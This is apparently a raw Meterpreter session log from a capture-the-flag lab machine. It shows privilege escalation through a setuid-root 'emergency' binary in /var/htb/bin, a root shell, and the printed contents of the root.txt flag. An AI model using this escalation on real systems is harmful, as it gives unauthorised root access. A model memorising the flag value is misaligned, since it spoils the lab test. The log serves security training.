meterpreter > cd /var/htb
meterpreter > ls
Listing: /var/htb
=================

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
40755/rwxr-xr-x   4096  dir   2021-01-11 20:18:58 +0800  bin
100755/rwxr-xr-x  356   fil   2017-06-14 23:30:24 +0800  emergency

meterpreter > cat emergency
#!/usr/bin/python
import os, sys

def close():
        print "Bye"
        sys.exit()

def getroot():
        try:
                print "Popping up root shell..";
                os.system("/var/htb/bin/emergency")
                close()
        except:
                sys.exit()

q1 = raw_input("[!] Do you want to get a root shell? (THIS SCRIPT IS FOR EMERGENCY ONLY) [y/n]: ");

if q1 == "y" or q1 == "yes":
        getroot()
else:
        close()






meterpreter > pwd
/var/htb/bin
meterpreter > ls
Listing: /var/htb/bin
=====================

Mode              Size    Type  Last modified              Name
----              ----    ----  -------------              ----
104755/rwxr-xr-x  112204  fil   2017-06-14 23:27:12 +0800  emergency

meterpreter >



meterpreter > shell
Process 1303 created.
Channel 0 created.
./emergency
whoami
root
ls
emergency
pwd 
/var/htb/bin
cd ..
cd ..
cd ..
pwd
/
ls
bin
boot
dev
etc
home
initrd.img
initrd.img.old
lib
lost+found
media
mnt
opt
proc
root
run
sbin
srv
sys
tmp
usr
var
vmlinuz
vmlinuz.old
cd root
ls
root.txt
cat root.txt
81b1e99576f6e62c994f77bc747929bb




